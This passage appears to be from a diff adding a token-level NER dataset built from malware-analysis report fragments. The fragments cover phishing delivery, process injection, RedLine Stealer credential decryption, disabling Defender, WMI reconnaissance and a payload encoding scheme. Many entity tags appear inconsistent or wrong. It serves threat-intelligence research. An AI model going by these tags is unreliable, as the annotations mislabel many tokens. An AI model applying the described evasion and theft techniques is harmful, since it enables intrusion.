"%AppData%\\AnyDesk\\ad.trace,", + "show", + "that", + "it", + "was", + "used", + "during", + "Day", + "1", + "and", + "Day", + "7", + "of", + "this", + "intrusion" + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "threat", + "actors", + "managed", + "to", + "get", + "access", + "to", + "the", + "beachhead", + "host", + "after", + "the", + "successful", + "execution", + "of", + "a", + "lnk", + "file", + "within", + "an", + "ISO,", + "which", + "are", + "usually", + "distributed", + "through", + "email", + "campaigns." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-OffAct", + "O" + ] + }, + { + "tokens": [ + "Threat", + "actors", + "also", + "created", + "a", + "remote", + "thread", + "in", + "svchost.exe" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Right", + "after", + "its", + "execution,", + "the", + "wab.exe", + "process", + "created", + "two", + "remote", + "threads", + "in", + "order", + "to", + "inject", + "code", + "into", + "explorer.exe", + "and", + "rundll32.exe:" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "the", + "service", + "account", + "password", + "was", + "weak", + "and", + "cracked", + "offline", + "by", + "threat", + "actors." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Named", + "pipes", + "were", + "created", + "in", + "order", + "to", + "establish", + "communication", + "between", + "CS", + "processes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Named", + "piped", + "are", + "commonly", + "used", + "by", + "Cobalt", + "Strike", + "perform", + "various", + "techniques." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "CMD-based", + "scripts" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "CMD-based", + "scripts" + ], + "ner_tags": [ + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "CMD-based", + "scripts" + ], + "ner_tags": [ + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "gets", + "executed", + "via", + "the", + "“SHELLEXECUTE”." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "The", + "first", + ".CMD", + "file", + "set", + "seen", + "to", + "use", + "AutoIt", + "in", + "its", + "execution" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Each", + "email", + "has", + "an", + "HTML", + "attachment." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "The", + "email", + "text", + "employs", + "scare", + "tactics,", + "such", + "as", + "evidence", + "of", + "a", + "traffic", + "violation,", + "prompting", + "the", + "user", + "to", + "open", + "the", + "HTML", + "attachment" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "prompting", + "the", + "user", + "to", + "open", + "the", + "HTML", + "attachment" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile" + ] + }, + { + "tokens": [ + "contains", + "some", + "junk", + "code", + "and", + "data", + "in", + "HEX", + "format." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "The", + "data", + "blob", + "in", + "HEX", + "decodes" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "slightly", + "obfuscated", + "URL", + "address" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "two", + "base64", + "encoded", + "data", + "blobs", + "and", + "code", + "instructions", + "for", + "its", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "base64", + "data", + "block", + "execution" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "first", + "base64", + "data", + "blob" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "All", + "data", + "is", + "then", + "sent", + "back", + "to", + "the", + "attacker's", + "C2" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O" + ] + }, + { + "tokens": [ + "the", + "attacker's", + "C2", + "via", + "the", + "HTTP", + "POST", + "method." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "C2", + "is", + "constructed", + "with", + "the", + "victim's", + "enumerated", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "extract", + "sensitive", + "information," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "operating", + "system", + "version" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "OS", + "architecture", + "(x86", + "or", + "x64)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "keyboard", + "layout" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Opening", + "the", + "attached", + "“multa_de_transito_502323.html”", + "file", + "triggers", + "the", + "embedded", + "JavaScript" + ], + "ner_tags": [ + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "download", + "a", + "“.VBS”", + "file" + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "It", + "proceeds", + "by", + "downloading", + "the", + "“sqlite3.dll”", + "file" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "to", + "steal", + "Outlook", + "data", + "such", + "as", + "server,", + "user,", + "and", + "password", + "from", + "POP3,", + "SMPT,", + "and", + "IMAP", + "registry", + "keys" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exploiting", + "vulnerable", + "web-facing", + "devices" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "exfiltrate", + "proprietary", + "or", + "confidential", + "information," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "decrypting", + "a", + "shellcode" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "starts", + "by", + "decrypting", + "its", + "initial", + "configuration", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "starts", + "its", + "code", + "by", + "decrypting", + "its", + "initial", + "configuration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "code", + "of", + "the", + "decryption", + "algorithm", + "used", + "by", + "RedLine", + "Stealer", + "to", + "decrypt", + "its", + "initial", + "configuration", + "data" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "initial", + "configuration", + "data", + "has", + "been", + "decrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "decrypt", + "the", + "password", + "stored" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "master", + "key", + "is", + "decrypted," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "decrypt", + "it", + "using", + "AES", + "GCM", + "algorithm" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "password" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Try", + "to", + "disable", + "Windows", + "Defender", + "service", + "“WinDefend”" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Try", + "to", + "disable", + "Tamper", + "Protection", + "settings", + "of", + "Windows", + "Defender" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Try", + "to", + "Disable", + "AntiSpyware,", + "Real", + "Time", + "Protection", + "and", + "notification", + "of", + "Windows", + "Defender." + ], + "ner_tags": [ + "O", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SecTeam" + ] + }, + { + "tokens": [ + "Disable", + "Windows", + "update", + "services", + "such", + "as", + "(“wuauserv”,", + "“WaaSMedicSvc”,", + "“UsoSvc”)" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile" + ] + }, + { + "tokens": [ + "Disable", + "Automatic", + "Update", + "and", + "change", + "Windows", + "configurations", + "related", + "to", + "Windows", + "Update" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "which", + "is", + "often", + "encoded", + "or", + "encrypted", + "to", + "prevent", + "detection" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "combination", + "of", + "Base64", + "and", + "XOR", + "functions." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "The", + "master", + "key", + "is", + "encoded", + "with", + "Base64", + "and", + "encrypted" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "grab", + "the", + "encoded", + "and", + "encrypted", + "master", + "key" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "will", + "parse", + "the", + "AES", + "IV", + "(Initialization", + "vector)", + "and", + "the", + "encrypted", + "password" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "to", + "steal", + "information", + "from", + "the", + "compromised", + "or", + "targeted", + "host" + ], + "ner_tags": [ + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "has", + "the", + "ability", + "to", + "collect", + "or", + "extract", + "various", + "types", + "of", + "system", + "information", + "from", + "a", + "targeted", + "or", + "compromised", + "computer" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "func_GetHostSerialNumber()" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "host", + "serial", + "number" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Retrieves", + "system", + "default", + "language,", + "timezone", + "and", + "OS", + "version" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get", + "processor", + "information", + "of", + "the", + "compromised", + "host", + "by", + "executing", + "\"SELECT", + "*", + "FROM", + "Win32_Processor\"" + ], + "ner_tags": [ + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "B-Way", + "B-SecTeam" + ] + }, + { + "tokens": [ + "func_GetProcessor()" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "func_GetLanguageTimeZoneOsVersion()" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "func_GetGraphicCards" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Get", + "AdapterRAM", + "and", + "Graphic", + "Card", + "Name", + "and", + "type", + "by", + "executing", + "\"root\\\\CIMV2\",", + "\"SELECT", + "*", + "FROM", + "Win32_VideoController\"" + ], + "ner_tags": [ + "I-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "func_GetTotalRAM()" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Get", + "the", + "total", + "RAM", + "size", + "of", + "compromised", + "host", + "by", + "executing", + "\"SELECT", + "*", + "FROM", + "Win32_OperatingSystem\"", + "and", + "look", + "for", + "\"TotalVisibleMemorySize\"" + ], + "ner_tags": [ + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Retrieve", + "the", + "user", + "domain", + "name,", + "username" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Get", + "the", + "user", + "name", + "of", + "the", + "compromised", + "host" + ], + "ner_tags": [ + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "func_GetUserName()" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Parse", + "firewall", + "and", + "Anti", + "Virus", + "Product", + "install", + "in", + "the", + "compromised", + "host", + "by", + "running", + "\"SELECT", + "*", + "FROM", + "ROOT\\\\SecurityCenter2\"", + "\"SELECT", + "*", + "FROM", + "ROOT\\\\SecurityCenter\"", + "\"SELECT", + "*", + "FROM", + "AntivirusProduct\"", + "\"SELECT", + "*", + "FROM", + "FirewallProduct\"", + "\"SELECT", + "*", + "FROM", + "AntiSpyWareProduct\"" + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SecTeam", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SecTeam", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SecTeam" + ] + }, + { + "tokens": [ + "func_GetFirewalls()" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "func_ListProcesses()" + ], + "ner_tags": [ + "B-SamFile" + ] + }, + { + "tokens": [ + "Retrieve", + "process", + "list", + "and", + "process", + "information", + "by", + "running", + "'SELECT", + "*", + "FROM", + "Win32_Process'" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Screen", + "Capture" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "func_ScanScreen()", + "is", + "the", + "one", + "responsible", + "for", + "this", + "screen", + "capture", + "capability" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "has", + "a", + "functionality", + "to", + "capture", + "a", + "screenshot", + "of", + "the", + "targeted", + "or", + "compromised", + "host", + "as", + "part", + "of", + "its", + "data", + "collection", + "and", + "exfiltration" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "uses", + ".NET", + "Graphics", + "class", + "CopyFromScreen", + "Function()", + "to", + "transfer", + "a", + "bit", + "block", + "of", + "color", + "data", + "from", + "the", + "screen", + "to", + "the", + "Graphic", + "drawing", + "surface", + "that", + "will", + "be", + "saved", + "in", + "memory", + "stream", + "for", + "data", + "exfiltration." + ], + "ner_tags": [ + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Parse", + "all", + "installed", + "application", + "in", + "the", + "compromised", + "host", + "by", + "querying", + "'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall'", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Parse", + "browser", + "application", + "and", + "browser", + "version", + "installed", + "in", + "the", + "compromised", + "host", + "by", + "querying", + "\"SOFTWARE\\WOW6432Node\\Clients\\StartMenuInternet\"", + "or", + "\"SOFTWARE\\Clients\\StartMenuInternet\"", + "registry" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "uses", + ".NET", + "Graphics", + "class", + "CopyFromScreen", + "Function()" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "using", + "Windows", + "CryptProtectData()", + "API." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "cracking", + "browser", + "sensitive", + "information", + "like", + "passwords" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decrypted", + "password", + "will", + "be", + "sent", + "to", + "its", + "C2", + "Server", + "as", + "part", + "of", + "its", + "data", + "exfiltration." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "enumerates", + "several", + "known", + "Crypto", + "Wallet", + "directories", + "and", + "looks", + "for", + "files", + "related", + "to", + "crypto", + "currencies", + "by", + "looking", + "for", + "files", + "having", + "“wallet”", + "substring", + "on", + "its", + "file", + "name." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "used", + "a", + "compiled", + "remote", + "desktop", + "malware," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "then", + "executed", + "RDPEnable", + "on", + "the", + "infected", + "machine." + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "There", + "were", + "also", + "instances", + "of", + "the", + "malware", + "actors", + "using", + "PsEXEC", + "to", + "enable", + "the", + "remote", + "desktop", + "protocol", + "(RDP)", + "of", + "a", + "target", + "system" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "enumerates", + "files", + "and", + "directories" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "File", + "enumeration" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "FindFirstFileW,", + "FindNextFileW,", + "and", + "FindClose", + "APIs" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "For", + "each", + "directory", + "it", + "traverses" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "using", + "FindFirstFileW,", + "FindNextFileW,", + "and", + "FindClose", + "APIs" + ], + "ner_tags": [ + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "installing", + "remote", + "access", + "software." + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "actors", + "used", + "tools", + "such", + "as", + "PCHunter,", + "PowerTool,", + "GMER,", + "and", + "Process", + "Hacker", + "to", + "disable", + "any", + "security-related", + "services", + "running", + "in", + "the", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "by", + "listing", + "accessible", + "local", + "IPs" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "It", + "checks", + "for", + "the", + "number", + "of", + "processors", + "in", + "the", + "infected", + "system" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Checking", + "the", + "number", + "of", + "processors" + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "is", + "a", + "multi-stage", + "attack", + "that", + "involves", + "sideloading", + "DLLs," + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-OffAct", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "involves", + "sideloading", + "DLLs", + "along" + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "icon", + "files", + "with", + "encrypted", + "data", + "appended", + "to", + "the", + "end", + "of", + "the", + "files." + ], + "ner_tags": [ + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "These", + "encrypted", + "strings," + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "once", + "decrypted,", + "contained", + "the", + "C2", + "domains", + "for", + "additional", + "malicious", + "artifacts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "attempt", + "to", + "obtain", + "system", + "information" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "malware", + "attempts", + "to", + "retrieve", + "additional", + "malicious", + "artifacts" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Inject", + "and", + "execute", + "DLLs" + ], + "ner_tags": [ + "B-Features", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Manipulate", + "processes", + "(list" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Manipulate", + "files", + "and", + "directories", + "(list" + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "Manipulate", + "files", + "and", + "directories", + "(list,", + "download,", + "upload,", + "view,", + "delete" + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "B-HackOrg", + "B-Features", + "B-Features", + "B-Features", + "B-Features", + "B-Features" + ] + }, + { + "tokens": [ + "download,", + "upload" + ], + "ner_tags": [ + "B-Features", + "B-Features" + ] + }, + { + "tokens": [ + "Take", + "screenshots" + ], + "ner_tags": [ + "O", + "O" + ] + }, + { + "tokens": [ + "Execute", + "commands", + "via", + "Command", + "Prompt" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "executed", + "using", + "ShellExecute", + "with", + "the", + "following", + "command", + "line:" + ], + "ner_tags": [ + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "This", + "type", + "of", + "threats", + "is", + "usually", + "delivered", + "as", + "email", + "attachments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Encoded", + "binary", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Encrypted", + "and", + "compressed", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Start", + "of", + "encrypted", + "and", + "compressed", + "loader", + "configuration", + "and", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "an", + "encoded", + "payload", + "split", + "across", + "several", + "nodes,", + "further", + "complicating", + "its", + "extraction." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "That", + "node", + "contains", + "the", + "encoded", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "encoded", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "To", + "hide", + "the", + "strings", + "it", + "uses", + "during", + "its", + "execution,", + "it", + "primarily", + "uses", + "a", + "simple", + "encoding", + "by", + "subtracting", + "35", + "from", + "each", + "character", + "of", + "the", + "original", + "string", + "and", + "encoding", + "the", + "result", + "with", + "Base64" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Similar", + "to", + "decoding", + "strings,", + "the", + "binary", + "payload", + "is", + "extracted", + "by", + "decoding", + "the", + "data", + "using", + "Base64", + "and", + "adding", + "35." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "the", + "resulting", + "bytes", + "are", + "further", + "decoded", + "with", + "xor", + "82." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "decoded", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Once", + "the", + "payload", + "is", + "decoded" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "decrypting", + "and", + "decompressing", + "the", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decrypted", + "and", + "decompressed", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Decodes", + "sensitive", + "memory", + "regions", + "in", + "the", + "current", + "process", + "with", + "the", + "same", + "XOR", + "key" + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "it", + "locates", + "a", + "packed", + "and", + "compressed", + "payload" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Injection", + "type:", + "Current", + "process", + "(1)", + "or", + "in", + "the", + "new", + "process" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "to", + "inject", + "into" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Process", + "to", + "inject", + "into" + ], + "ner_tags": [ + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "this", + "loader", + "prepends", + "a", + "stub", + "containing", + "79", + "bytes", + "of", + "junk", + "instructions", + "before", + "the", + "actual", + "payload", + "shellcode." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "bytes", + "at", + "25", + "hardcoded", + "offsets", + "within", + "this", + "stub", + "are", + "replaced", + "with", + "random", + "bytes", 